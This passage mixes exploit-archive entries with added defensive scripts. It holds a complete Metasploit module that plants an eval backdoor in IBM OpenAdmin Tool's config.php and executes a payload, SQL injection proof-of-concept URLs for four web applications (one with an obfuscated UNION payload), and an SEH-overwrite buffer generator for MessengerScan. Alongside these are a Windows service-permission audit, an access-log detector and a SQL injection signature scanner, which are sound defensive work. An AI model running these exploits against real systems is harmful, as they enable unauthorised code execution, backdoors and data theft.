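The two listings above show both weaknesses the advisory describes: an unquoted BINARY_PATH_NAME containing a space, and a 'C' (Change) ACE for 'Authenticated Users' on the service binaries, for a service that starts as LocalSystem. The following is an added audit script, not part of the advisory or of Automated Logic's software; it parses `sc qc` and `cacls` output in the format shown above and reports either condition. The sample strings are constructed copies of the advisory's listings, and the principal and rights-letter sets are the assumptions a Windows administrator would normally start from (cacls F/C/W and icacls M count as write access).

```python
import re

# Constructed sample input: the "sc qc" and "cacls" listings from the advisory,
# pasted as strings so the audit runs offline. On a live host, feed it the
# real command output instead.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Webctrl Service
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WebCTRL6.0\WebCTRL Service.exe -run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WebCTRL Service 6.0
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

CACLS_OUTPUT = r"""
C:\WebCTRL6.0\WebCTRL Service.exe BUILTIN\Administrators:(ID)F
                                  NT AUTHORITY\SYSTEM:(ID)F
                                  BUILTIN\Users:(ID)R
                                  NT AUTHORITY\Authenticated Users:(ID)C
"""

# Principals that every local account belongs to; write access for them is a finding.
LOW_PRIV_PRINCIPALS = {
    'NT AUTHORITY\\Authenticated Users',
    'BUILTIN\\Users',
    'Everyone',
}
# cacls: F = full, C = change, W = write; icacls: M = modify. Any of these lets the
# binary be replaced. (Assumed set; extend for your own baseline.)
WRITE_RIGHTS = set('FCWM')

# One ACE per line: "<DOMAIN\Principal>:(flags)(flags)RIGHTS", with the file path
# possibly preceding the first ACE on the same line.
ACE_RE = re.compile(r'(?:^|\s)([A-Za-z ]+\\[A-Za-z ]+|Everyone):((?:\([^)]*\))+)([A-Z]+)\s*$')


def parse_sc_qc(text):
    """Return the KEY : value pairs of an 'sc qc' listing as a dict."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r'\s*([A-Z_]+)\s*:\s*(.*)$', line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def unquoted_path_with_spaces(binary_path):
    """True if the image path is not quoted and contains a space before '.exe'.

    Windows tries each space-delimited prefix as a program in turn, so such a path
    is an unquoted-service-path weakness; arguments after the image are ignored."""
    p = binary_path.strip()
    if not p or p.startswith('"'):
        return False
    idx = p.lower().find('.exe')
    image = p if idx == -1 else p[:idx + 4]
    return ' ' in image


def parse_cacls(text):
    """Return [(principal, flags, rights), ...] from a cacls listing."""
    aces = []
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if m:
            aces.append((m.group(1).strip(), m.group(2), m.group(3)))
    return aces


def weak_aces(aces):
    """ACEs that give a low-privilege principal some form of write access."""
    return [(p, rights) for p, _flags, rights in aces
            if p in LOW_PRIV_PRINCIPALS and set(rights) & WRITE_RIGHTS]


def audit_service(sc_output, cacls_output):
    """Combine both checks into a list of human-readable findings."""
    cfg = parse_sc_qc(sc_output)
    findings = []
    path = cfg.get('BINARY_PATH_NAME', '')
    if unquoted_path_with_spaces(path):
        findings.append('unquoted service path with spaces: ' + path)
    for principal, rights in weak_aces(parse_cacls(cacls_output)):
        findings.append('%s can modify the service binary (%s)' % (principal, rights))
    if findings and cfg.get('SERVICE_START_NAME') == 'LocalSystem':
        findings.append('service runs as LocalSystem, so either issue yields SYSTEM-level code execution')
    return findings


if __name__ == '__main__':
    for finding in audit_service(SC_QC_OUTPUT, CACLS_OUTPUT):
        print('[!] ' + finding)
```

The remediation the findings point at is the standard one: quote the image path in the service's ImagePath value and remove the Change/Modify ACE so that only Administrators and SYSTEM can write the binaries, then re-run the audit against fresh `sc qc` and `cacls` output.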
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include REXML

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution',
      'Description' => %q{
        This module exploits an unauthenticated remote PHP code execution
        vulnerability in IBM OpenAdmin Tool included with IBM Informix
        versions 11.5, 11.7, and 12.1.

        The 'welcomeServer' SOAP service does not properly validate user input
        in the 'new_home_page' parameter of the 'saveHomePage' method allowing
        arbitrary PHP code to be written to the config.php file. The config.php
        file is executed in most pages within the application, and accessible
        directly via the web root, resulting in code execution.

        This module has been tested successfully on IBM OpenAdmin Tool 3.14
        on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'SecuriTeam', # Discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References' =>
        [
          ['CVE', '2017-1092'],
          ['EDB', '42091'],
          ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=swg22002897'],
          ['URL', 'https://blogs.securiteam.com/index.php/archives/3210'],
          ['URL', 'http://seclists.org/fulldisclosure/2017/May/105']
        ],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Privileged' => false, # Privileged on Windows but not on *nix targets
      'Targets' => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'May 30 2017',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The base path to IBM OpenAdmin Tool', '/openadmin' ])
      ]
    )
  end

  def set_home_page(homepage)
    xml = Document.new
    xml.add_element 'soapenv:Envelope', 'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
                                        'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema',
                                        'xmlns:soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/',
                                        'xmlns:urn' => 'urn:Welcome'
    xml.root.add_element 'soapenv:Header'
    xml.root.add_element 'soapenv:Body'
    body = xml.root.elements[2]
    body.add_element 'urn:saveHomePage', 'soapenv:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
    new_home_page = body.elements[1].add_element 'new_home_page', 'xsi:type' => 'xsd:string'
    new_home_page.text = homepage

    uri = normalize_uri target_uri.path, 'services', 'welcome', 'welcomeService.php'
    send_request_cgi 'method' => 'POST',
                     'uri' => uri,
                     'ctype' => 'text/xml; charset=UTF-8',
                     'headers' => { 'SOAPAction' => 'urn:QBEAction' },
                     'data' => xml.to_s
  end

  def check
    fingerprint = Rex::Text.rand_text_alpha(rand(10) + 6)
    res = set_home_page "\";##{fingerprint}"

    unless res
      vprint_status "#{peer} Connection failed"
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ %r{<ns1:saveHomePageResponse><return xsi:type="xsd:string">";##{fingerprint}</return>}
      return CheckCode::Detected
    end

    Msf::Exploit::CheckCode::Safe
  end

  def exploit
    cmd_param = Rex::Text.rand_text_alpha(rand(10) + 6)
    res = set_home_page "\";eval($_POST['#{cmd_param}']); #"

    unless res
      vprint_status "#{peer} Connection failed"
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ /<ns1:saveHomePageResponse><return xsi:type="xsd:string">";eval/
      print_good "#{peer} Wrote backdoor to config.php file successfully"
    else
      fail_with Failure::UnexpectedReply, "#{peer} Failed to backdoor config.php"
    end

    vprint_status "#{peer} Executing payload..."
    send_request_cgi({ 'method' => 'POST',
                       'uri' => normalize_uri(target_uri.path, 'conf', 'config.php'),
                       'vars_post' => { cmd_param => payload.encoded } }, 5)

    print_warning "#{peer} Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor"
  end
end
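The module's description gives a two-step chain that is visible in ordinary web server access logs: a POST to `services/welcome/welcomeService.php` (the SOAP `saveHomePage` call) followed by a POST to `conf/config.php`, a file that is meant to be included by other pages and never posted to directly. The following is an added detection script, not part of the module or of IBM's product; it correlates those two requests per client IP over constructed Combined Log Format sample lines. The ten-minute window and the log format are assumptions, and the `php_double_quoted_literal` helper illustrates the escaping the `new_home_page` value would have needed before being written into a PHP string literal; it is not OpenAdmin Tool's own fix.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access log (Combined Log Format). The first two lines model
# the chain the module performs; the last two model an unrelated client.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [30/May/2017:10:01:02 +0000] "POST /openadmin/services/welcome/welcomeService.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [30/May/2017:10:01:04 +0000] "POST /openadmin/conf/config.php HTTP/1.1" 200 34 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/May/2017:10:05:00 +0000] "GET /openadmin/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/May/2017:10:06:00 +0000] "POST /openadmin/conf/config.php HTTP/1.1" 200 34 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SOAP_ENDPOINT = '/services/welcome/welcomeservice.php'
CONFIG_FILE = '/conf/config.php'


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['path'] = rec['path'].split('?', 1)[0].lower()
    return rec


def find_oat_exploit_chains(lines, window=timedelta(minutes=10)):
    """Return (ip, soap_time, config_time) for each client that POSTs to the
    welcomeService SOAP endpoint and then to conf/config.php within `window`."""
    last_soap_post = {}   # ip -> timestamp of the most recent SOAP POST
    chains = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['method'] != 'POST':
            continue
        if rec['path'].endswith(SOAP_ENDPOINT):
            last_soap_post[rec['ip']] = rec['ts']
        elif rec['path'].endswith(CONFIG_FILE):
            t0 = last_soap_post.get(rec['ip'])
            if t0 is not None and rec['ts'] - t0 <= window:
                chains.append((rec['ip'], t0, rec['ts']))
    return chains


def config_php_posts(lines):
    """IPs that POST directly to conf/config.php at all; legitimate use of the
    application never does this, so each one deserves a look even without the
    preceding SOAP call."""
    ips = set()
    for line in lines:
        rec = parse_line(line)
        if rec and rec['method'] == 'POST' and rec['path'].endswith(CONFIG_FILE):
            ips.add(rec['ip'])
    return ips


def php_double_quoted_literal(value):
    """Encode an untrusted string as a PHP double-quoted literal so it cannot
    terminate the literal or interpolate variables. Assumed hardening, shown
    for illustration; it is not the vendor's patch."""
    escaped = value.replace('\\', '\\\\').replace('"', '\\"').replace('$', '\\$')
    return '"' + escaped + '"'


if __name__ == '__main__':
    for ip, t0, t1 in find_oat_exploit_chains(SAMPLE_ACCESS_LOG):
        print('[!] %s: saveHomePage at %s, config.php POST at %s' % (ip, t0, t1))
    print('[i] clients posting to config.php: %s' % sorted(config_php_posts(SAMPLE_ACCESS_LOG)))
```

Two signals are reported on purpose: the correlated chain is high confidence, while a lone POST to config.php catches a slower or split attempt that the window would miss. Once a chain is found, the module's own warning says what to look for on disk: a `config.php` that differs from `BAKconfig.php`.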
# # # # #
# Exploit Title: Joomla! Component Appointment v1.1 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extensions/extension/appointment/
# Demo: http://joomlaextension.biz/appointment/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows members of the working user group to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php/service-list?view=allorder&ser_id=[SQL]
# -84+/*!11111union*/+/*!11111select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
#
# http://localhost/[PATH]/index.php/service-list?view=allorder&emp_id=[SQL]
#
# <input type="hidden" name="sername" id="sername" value="............
#
# Etc...
# # # # #
# # # # #
# Exploit Title: Matrimony Script 2.7 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://www.matrimony-script.com/
# Software Link: http://www.matrimony-script.com/php-matrimony-software.html
# Demo: http://www.matrimonysearch.com/
# Version: 2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/wedding.php?category=[SQL]&city=[SQL]
#
# http://localhost/[PATH]/homeads.php?id=[SQL]
#
# Etc...
# # # # #
#!/usr/bin/python
# Exploit Title : MessengerScan v1.05 Hostname/IP Field SEH/EIP Overwrite POC
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Discovery Date : 18/08/2017
# Software Link : https://www.mcafee.com/in/downloads/free-tools/messengerscan.aspx#
# Tested Version : 1.05
# Vulnerability Type: SEH Overwrite POC
# Tested on OS : Windows 7 Ultimate x64
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
#SEH chain of main thread
#Address SE handler
#42424242 *** CORRUPT ENTRY ***
# Offset to the SEH is 772
buffer = "A"*772
# Address to the Handler Code
seh = "B"*4
#Junk
junk = "C"*12
# Address to the EIP
eip = "D"*4
f = open("evil.txt", "wb")
f.write(buffer+seh+junk+eip)
f.close()
# # # # #
# Exploit Title: Joomla! Component KissGallery 1.0.0 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: http://terrywcarter.com/
# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/kissgallery/
# Demo: http://demo.terrywcarter.com/kissgallery
# Version: 1.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/kissgallery/1[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: LiveProjects 1.0 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://livecrm.co/
# Software Link: https://codecanyon.net/item/liveprojects-complete-project-management-crm/10436800
# Demo: http://liveprojects.livecrm.co/livecrm/web/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows users to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
#
# http://localhost/[PATH]/index.php?r=pmt/task/task-view&id=[SQL]
#
# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
#
# Etc...
# # # # #
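The four SQL injection advisories above (Joomla! Appointment, Matrimony Script, KissGallery, LiveProjects) all put the payload in a query-string or path parameter, and the Appointment PoC shows the evasion style a filter has to survive: URL-encoded spaces, mixed case, and MySQL versioned comments (`/*!11111union*/`) that a naive keyword match misses but the database still executes. The following is an added detection example, not part of any of the advisories; it normalises a parameter value the way MySQL would read it and then applies a small, assumed set of injection signatures. The sample URLs are the advisories' own PoC shapes with constructed benign values beside them.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Assumed signature set; tune for your application. Each pattern runs on the
# normalised (decoded, comment-stripped, lower-cased) value.
SQLI_PATTERNS = [
    r'\bunion\b\s+(?:all\s+)?\bselect\b',
    r'\bselect\b[\s\S]+\bfrom\b',
    r'\binformation_schema\b',
    r'\b(?:sleep|benchmark|extractvalue|updatexml|export_set|load_file)\s*\(',
    r"['\"]\s*(?:or|and)\s+\S+\s*=",
]

# Constructed sample inputs: the Appointment PoC value from the advisory above,
# plus benign values for the other advisories' parameters.
SAMPLE_URLS = [
    'http://localhost/[PATH]/index.php/service-list?view=allorder&ser_id='
    '-84+/*!11111union*/+/*!11111select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)'
    'fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,'
    '0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-',
    'http://localhost/[PATH]/wedding.php?category=3&city=12',
    'http://localhost/[PATH]/homeads.php?id=17',
    'http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=5',
]


def normalize(value):
    """Rewrite a parameter value into the form MySQL effectively parses."""
    s = unquote_plus(value)
    # MySQL executes the body of /*!NNNNN ... */ when its version is >= NNNNN,
    # so keep the body and drop only the comment markers.
    s = re.sub(r'/\*!\d*\s*(.*?)\*/', r'\1', s, flags=re.S)
    # Ordinary block comments are whitespace to the parser.
    s = re.sub(r'/\*.*?\*/', ' ', s, flags=re.S)
    s = re.sub(r'\s+', ' ', s)
    return s.lower().strip()


def looks_like_sqli(value):
    """True if the normalised value matches any injection signature."""
    n = normalize(value)
    return any(re.search(p, n) for p in SQLI_PATTERNS)


def scan_url(url):
    """Names of query parameters in `url` whose values look like SQL injection."""
    query = urlsplit(url).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if looks_like_sqli(value)]


if __name__ == '__main__':
    for url in SAMPLE_URLS:
        flagged = scan_url(url)
        print('[%s] %s' % ('!' if flagged else ' '), url[:80])
        for name in flagged:
            print('    suspicious parameter: ' + name)
```

Signature matching like this belongs in a WAF or log review, not in the application: the fix for each advisory is the same parameterised query (in Joomla terms, `$db->quote()` or bound parameters) that leaves the parser nothing to match. The `select ... from` pattern will also fire on free-text fields containing those English words, so scope it to numeric and identifier parameters such as `id`, `ser_id` and `emp_id`.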